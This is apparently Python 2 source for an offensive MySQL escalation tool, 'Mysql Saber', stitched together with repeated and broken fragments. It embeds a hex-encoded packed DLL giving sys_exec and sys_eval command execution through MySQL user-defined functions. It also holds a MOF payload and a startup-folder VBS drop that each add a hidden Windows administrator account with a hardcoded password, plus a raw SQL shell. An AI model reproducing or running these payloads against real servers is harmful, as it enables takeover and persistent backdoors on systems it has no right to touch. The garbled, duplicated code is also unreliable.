def Sudf(sword):
udf = '0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000f2950208b6f46c5bb6f46c5bb6f46c5b9132175bb4f46c5b9132115bb7f46c5b9132025bb4f46c5b9132015bbbf46c5b75fb315bb5f46c5bb6f46d5b9af46c5b91321d5bb7f46c5b9132165bb7f46c5b9132145bb7f46c5b52696368b6f46c5b0000000000000000504500004c0103004e10a34d0000000000000000e00002210b010800001000000010000000600000d07b0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000b0810000c800000000800000b001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009c7d00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000e055505831000000000010000000700000000e000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000120000000000000000000000000000400000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e303500555058210d09020947a37b47fae6101946550000c90b000000200000260000a4ffffffff8b4c240833c03901741656578b7c24146a0c59be000010dcf3a566a55fb0015eaefdbbfdc3c38b44240c1b6a071711108bf81933ffdfedb7181da45fc7011e12005e210883380175128b40040df6776f0700750a1004c6000132c0c3540a6f2ff68d3c3054a455322d08ff30bfbdfbddff156d8885c05975085614c601011bc8568d7101ffdbb7ff8a114184d275f98b54142bce890a32558bec8b4d0c8339022d36d86f5374148b7d10915c54536f67eff7eb4c8b417d740f1b707c1bebe58366ecffed6004001a0c8b48048b008d4401025072a037f2dd6e4e08891875113006a44cdd96efedebb2b85f5e5da3040c287408dbf6c79e33a8591353568b742410d8785346bb707b6b02b6460851c78d5c4357e824ceddfd770ab81400c604070008ff70041e05767b43b2531a22c4185357200300544126e136086a995b420b7e780a84033b9859991a83ec0cfb5bfbeb9735d9576800f15cd66a018945fc06bb75dd7f8bf08b450cc60600326848c03733ff396dedef1e9c8b1d0590506a04ff75fc2aacd37d2ebcbd991ceb402dfc8d487e10402bc1b68d6dbf18f803c7505606f4348c2bf851bbb5b1bb3003fe5710940bd47df44463eec21741202f75bc131ca40b03fbff803e0059741a8bc6c64437ff00567b14df3ab68589b3066c18285f205e5bc9c3d6b6ae73f3c951f77d5247e3306ddb2ccb5008c9c26a98f0bf1726b4b710548d4601b23b5c4f08eddb09ee56ff31bba0947e0c6aff8dc082b55d7b2082ee02f8092c0fdbc6c123005fee5e6b6a0c125e58f886909609848365fc1d4550d0eb075bd85ed81b405f65e8c742fe24ff0d0bdb855f1fc9c24e3b0d08209602dbcefeedf3c3e908065556688000005680965608b8bfcb1f8485f65959a32354045075054bfeed762fac8326004308166d083e0904c70424ff098fdd06075d0b5933c0cf5533ed3bc5750edd7f85dd392d66107e2b6e1083f8018b0810dd7d77e1548b09db57890a23440f85cc7964a118771c61c3058104c2385521234ceb0df6dfb5184d9d051a3bc7741768e803a03cee76c3b6ff57a1d396e7eb036645a12bb7fbfbb7480d6a025f74096a1fe056eb3c9e10c80460fadcf7c0c7051f015e1a50267fdf77b6c007581720bc04b81b4a5989f784a6b13d4bedbc5504408312c97defd258851e6807e4de4294bbbd7769ff321c57042618ff05e0bd6f6bdf5414f7d38ecd3dcab6c6809dc90bbe55c75bd783bd10ebbeebb91402740ab759be8d1db6eb4835713b78258bd885dbb8b410db6c3414eed7e1f8ebf45f68da4607c102dc83ef043bfb73f1530811c682ca067caab4307b1b8525e32d60c77c6c7cc9bc985b5dc20c3e1029286fb86f8d8b8ff28b5d081c73e433c9f04dbbd2894d376a2008683bf1751039ffc75688b60c17e426103bf0740583fe5ba1f5ee02752eb910d03bc148897fd0db39f7773b837de4000f8493f6115a037f147d27d99aa71280096227feac9ddd6d1324fb2057501357a72f8df6bad852d90611537c67bb617f6a0375434f34032168746d3cecb02e2c257feb1bf0eca3f0bd75bb09aae05051595ce7f9413ab5d20b2f0f013d46da761906292ae407c31b6d5b8daeec16ffd79a089a052cd0307cd600d688bc109b0c770dab0c10051e5936c981ece18f0d8628c55d2120bc211c895a3f3eecb8211889b3211438211041210c7ded6bdf668c183806252c062008a9344bb306050425001a6c63edfbfc9c8f14309156240704acfdb7f428f20807348b85e0fc9ca6b67b5b6370c201a11c19202413778e513a1809c9e0201c1db37cee25d38985d8320a04dc7e8d6f04ff24346879df945963ec63b04128fad40a2ce7bdc3b6da20110823685b9e0a678d1b3068342f033c887c5cf81e9a5b6a144650c0c391c1b435d659e7f85a1b63ed324d3970d7619fb8363bfc37ac598b2e2827add0ba60d90ae0f3b903b16dfbdce450352aa612dc0ae45440db626c60d6d30fe009859710c3d4e5d107fb371ddad984dcd166a09ec3bb0e6eff1a65f7d81bc00359487eb8b018bf2db1d57a0451e5735806b0d2cb2049c6f772f11f23c28e90672020cc00d0fa054727d281394d5a748ba1f09728ee973c03c1813850ce4936f85b69f04f1878180b010f941dc1fc3612c336844825c80fb74114121bdf0a0505710633d2ec57c9fabf9df80818761e201d0c3bf972098b580803d9d4feb758e07221c20183c0283bd672e660619241c0c2e970ba0330d0fd7af00052996c59ab3df94b7cc7365d50109c59112b29244f07e1f6c1e81ff7c3e00134eb202e00c1ac636b01a33d3ec0a2b11d85942845ab105805e3a491914c50ac2d13348483a1d287206deadc35936b204a2ce7a309e1646da91938de09f3186c036d0c039b8d2be0faa8316ac1da89f633c5508973810b796def0d139e04f064a337904dc3bbdba9096900595ffa8be55d51d8c3bb1bd810036803276850f9c4cec2c5b28c3e1064f82d222d20f8fea0bf4ee640bb1abc1958d3bb86360d85c32c33b63f15101404eb605671f8e3c61e6bed448b75948e0b1033f00714edcc95411899271cb0e0bed1daf4330c11137507be4f59c02fd12ee285f30af7c1e0100bf006e1638f4400f7d607045e5f5b495c464646c6056064686c0064474674b00000472fec0003360f201801ff7ffbff4e6f20617267756d656e7473096c6c6f77656420287564663a206cdcdf76ff69625f6d7973716c0d5f73085f696e666f29396dfbffc8182076657273696f6e20302e01341fbfbdddfd45787065637447657861076c79201a6520737472b5adb56f3f672074791b7572617105ec00b621722b747791fd36b0801f3f8672206e616d1d7bfb8148436f756c246e6f74c463618375dbb61320186d2779af72f148a9dd44093f2003121013df8b05f6e119216b07d0d6d5b0200f1f2d07293bac7b05f90b0d17cc27dd099bb0070fd81f0928033c92e85e611f030f0313e944d9000000ec1b6814e5b119bf44ff00515565110fc9a8aab200aa645455555532aa8ea22a195c03e07ffb0410020157616974466f725388bf35007e6c654f626a99145669727475fb9b03e0616c41760d536574456e7612b6df01706f6ec05661726961622b41753700de184372659454680664fbadfbb60d47264375727222502a636573734914f0c1660926135469636bdb7eb701de6e6b5175657279500366840d80587b6d616e3716fdf6f6b3f70144697367374c6962727879436192b6d6fedb731a4973446562756767266a6865dbdb76f746a4556e684064316445784670adb0d8db7469af46696c4a1957d8b694b41254176d0dd86b0d6f321149900a6b409db9e6dc766d70876547517f77b72c61ad5551221b5c7517da76537973186dee3941737365eda161e10975697c4c7d5f686fdfed0a7e396d5f2e5f616d7367087869740bd86f7f0b646a753a5f66646976260adc0f76a1639a5f64fd5f686f6f6b13b800b6d61459725f4875017c01d15f49735ec16dce0a330a6c21539c82056bf82a64d46e64133d6184c90f651e5f2c72346bcdb5ad56ed6d1c18700a036edf177b5f706f52296e106468756cc9dea3f05eb92a9b1b6cb7b5652ca8066ec5726525bd6d705b0866115673749c637079ae3517c108243932c06eade1f6664d0fd76f7319663a1dc2f60f1f5f437070583174bc6dffff63af343f0018183d193c1c1b161e552719111f0a062fffffffff111d5f10130a070d2e15090905140c1b08090b150618141505061b050c0d0608fddbbffd190613050d0f120f1d07050509062e0d18532d483406b7db72f20007080c3b060a390c05df6e6fb710070616120e0b06420b215637051f05776fb7ee9f0e5d2c0d001d4c61230d0c2e24080b97ffb7634106f0021004f02c01043808041c1c040090fe1d05ed4c0105004e10a34d867e93b6ffe00002210b0108080c8e003816b6b1b1c10b200e100b020204feec61c1330700600c4b070100023c1bd8c12a00100706c026dfb62b04a420ac22033c1440eb0d60750b0113509f3ab72cf62ac8214200a7bb0b0359b82f2eab787407c20a271bd860900cc442602e61b0dbd27264746108c508fb0a139aed862d0077402e26943da1dbc20304301b001a27061becdbc04f73726300eb40271cf8a311c04f5c6d009a01df948c4d03271e421ba000b463b72303d152127353030000000000000012ff00000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92b0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b071000001f35083c708ff96ec710000958a074708c074dc89f95748f2ae55ff96f071000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef47100008dbe00f0ffffbb0010000050546a045357ffd58d870702000080207f8060287f585054505357ffd558618d4424806a0039c475fa83ec80e99f98ffff000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000052010000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564338302e435254222076657273696f6e3d22382e302e35303630382e30222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e50410000000000000000000000000c820000ec810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006e820000000000004b45524e454c33322e444c4c004d5356435238302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c467265650000006672656500000000000000004d10a34d0000000054830000010000001200000012000000a0820000e8820000308300002210000021100000001000008f120000211000008c120000c51100002110000087110000b311000021100000871100007710000021100000441000002f1100001b110000aa100000698300007f8300009c830000b7830000c3830000d6830000e7830000f0830000008400000e8400001784000027840000358400003d8400004c84000059840000618400007084000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e6974000000000070000010000000dd3bd83ddc3d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a'
printWait( '''
0 for check by Saber
1 input by yourself
''' )
banben = raw_input("Please choose the path(0/1): ")
if banben == '1':
path = raw_input("Give me the path: ")
path = path.replace('\\','/')
elif banben == '0':
path = selectpath(sword)
else:
printError("[+Saber+]===> Hey boy, the select is wrong! And I'll check the path!")
path = selectpath(sword)
printResult("[+Saber+]===> udf's out path is : "+path)
try:
sword.execute('DROP TABLE IF EXISTS fuc_udf;')
time.sleep(1)
sword.execute('CREATE TABLE fuc_udf(udf BLOB);')
sword.execute('INSERT into fuc_udf values (CONVERT(%s,CHAR));' %udf)
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!")
return
#######################################################
''')
def Ssql(sword, sql):
try:
sword.execute(sql)
query = sword.fetchall()
for i in query:
for j in i:
print str(j) + "\n"
except Exception, e:
printError(e)
printError("[+Saber+]===> Hey boy, the SQL is wrong!")
else:
printResult("[+Saber+]===> DONE! ")
def main(sword):
sql = ''
while sql != 'q':
sql = raw_input("enter your SQL here/(press q to exit): ")
if sql != 'q':
Ssql(sword, sql)
printWait("[+Saber+]===> Quit sql and use other function? ")
scontinue = 'y'
scontinue = raw_input("continue?(y/n): y?")
if scontinue == 'n':
sword.close()
sys.exit()
#######################################################
# #
# Mysql Saber ---- MOF Knight #
# BY haxsscker#f4ck.net #
# #
#######################################################
''')
def Smof(sword):
try:
sword.execute('SELECT \'#pragma namespace("\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription")\r\n\r\ninstance of __EventFilter as $EventFilter\r\n{\r\n EventNamespace = "Root\\\\\\\\Cimv2";\r\n Name = "filtP2";\r\n Query = "Select * From __InstanceModificationEvent "\r\n "Where TargetInstance Isa \\\\"Win32_LocalTime\\\\" "\r\n "And TargetInstance.Second = 5";\r\n QueryLanguage = "WQL";\r\n};\r\n\r\ninstance of ActiveScriptEventConsumer as $Consumer\r\n{\r\n Name = "consPCSV2";\r\n ScriptingEngine = "JScript";\r\n ScriptText = \r\n "var WSH = new ActiveXObject(\\\\"WScript.Shell\\\\")\\\\nWSH.run(\\\\"net.exe adminha adminha /add&net.exe localgroup administrators adminha /add\\\\")";\r\n};\r\n\r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = $Consumer;\r\n Filter = $EventFilter;\r\n};\' INTO DUMPFILE \'c:/windows/system32/wbem/mof/nullevt.mof\';')
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
else:
printResult('''
[+Saber+]===> Hey, you have done it!
[+Saber+]===> Oh, the user&pass are both \"adminha\" !!Good luck!!
[+Saber+]===> Please waiting for several minutes, and then you may check it!!
''')
def main(sword):
Smof(sword)
printWait("[+Saber+]===> Quit mof and use other function? ")
scontinue = 'y'
scontinue = raw_input("continue?(y/n): y?")
if scontinue == 'n':
sword.close()
sys.exit()
# #
#######################################################
''')
def Ssql(sword,sql):
try:
sword.execute(sql)
query = sword.fetchall()
for i in query:
for j in i:
print str(j)+"\n"
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, the SQL is wrong!")
else:
printResult("[+Saber+]===> DONE! ")
def main(sword):
sql = ''
while sql != 'q':
sql = raw_input("enter your SQL here/(press q to exit): ")
if sql != 'q':
Ssql(sword,sql)
printWait("[+Saber+]===> Quit sql and use other function? ")
scontinue = 'y'
scontinue = raw_input("continue?(y/n): y?")
if scontinue == 'n':
sword.close()
sys.exit()
try:
sword.execute('SELECT udf FROM fuc_udf INTO DUMPFILE \'%s/fucudf.dll\';' %path)
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!")
return
if path == 'C:/RECYCLED/':
try:
sword.execute("create function backshell returns string soname 'C:/RECYCLED/fucudf.dll';")
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!")
return
else:
printResult("[+Saber+]===> UDF Knight has done its job!!")
printWait("[+Saber+]===> try some command just like \"ipconfig\"")
sword.execute('DROP TABLE IF EXISTS fuc_udf;')
else:
try:
sword.execute("create function sys_eval returns string soname 'fucudf.dll';")
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!")
return
else:
printResult("[+Saber+]===> UDF Knight has done its job!!")
printWait("[+Saber+]===> try some command just like \"ipconfig\"")
sword.execute('DROP TABLE IF EXISTS fuc_udf;')
def Sudfsql(sword,sql):
printWait("[+Saber+]===> OK, let's f4ck the Monster!!!")
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
sys.exit()
try:
sword = conn.cursor()
sword.execute('select version();')
v = sword.fetchall()
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
sys.exit()
else:
printResult("[+Saber+]===> That's the version: "+v[0][0])
return sword
def Shelp(IP,username,password,database,port):
sword = Sconnect(IP,username,password,database,port)
while 1:
chioce = '5'
printWait('''
[+Saber+]===> Your Highness, I'll be your sword and shield !
MOF ----> 1
UDF ----> 2
LPK ----> 3
VBS ----> 4 (ENGLISH PATH ONLY!)
SQL ----> 0
Please make your chioce!!(press q to exit!!)
#######################################################
''')
def Smof(sword):
try:
sword.execute(
'SELECT \'#pragma namespace("\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription")\r\n\r\ninstance of __EventFilter as $EventFilter\r\n{\r\n EventNamespace = "Root\\\\\\\\Cimv2";\r\n Name = "filtP2";\r\n Query = "Select * From __InstanceModificationEvent "\r\n "Where TargetInstance Isa \\\\"Win32_LocalTime\\\\" "\r\n "And TargetInstance.Second = 5";\r\n QueryLanguage = "WQL";\r\n};\r\n\r\ninstance of ActiveScriptEventConsumer as $Consumer\r\n{\r\n Name = "consPCSV2";\r\n ScriptingEngine = "JScript";\r\n ScriptText = \r\n "var WSH = new ActiveXObject(\\\\"WScript.Shell\\\\")\\\\nWSH.run(\\\\"net.exe adminha adminha /add&net.exe localgroup administrators adminha /add\\\\")";\r\n};\r\n\r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = $Consumer;\r\n Filter = $EventFilter;\r\n};\' INTO DUMPFILE \'c:/windows/system32/wbem/mof/nullevt.mof\';'
)
except Exception, e:
printError(e)
printError(
"[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP..."
)
else:
printResult('''
[+Saber+]===> Hey, you have done it!
[+Saber+]===> Oh, the user&pass are both \"adminha\" !!Good luck!!
[+Saber+]===> Please waiting for several minutes, and then you may check it!!
''')
def main(sword):
Smof(sword)
printWait("[+Saber+]===> Quit mof and use other function? ")
scontinue = 'y'
scontinue = raw_input("continue?(y/n): y?")
if scontinue == 'n':
sword.close()
sys.exit()
except Exception,e:
sword.execute('DROP TABLE IF EXISTS fuc_vbs;')
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!")
return
else:
printWait("[+Saber+]===> vbs has been inserted into the DB!!")
try:
sword.execute('select * from fuc_vbs into outfile "c:/docume~1/alluse~1/Start Menu/Programs/Startup/a.vbs";')
except Exception,e:
printError(e)
printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
else:
sword.execute('DROP TABLE IF EXISTS fuc_vbs;')
printResult('''
[+Saber+]===> Hey, you have done it!
[+Saber+]===> Oh, the user&pass are both \"f4ckhaha\" !!Good luck!!
[+Saber+]===> Please restart the PC!!
''')
def main(sword):
Svbs(sword)
printWait("[+Saber+]===> Quit vbs and use other function? ")
scontinue = 'y'
scontinue = raw_input("continue?(y/n): y?")
if scontinue == 'n':
sword.close()
sys.exit()
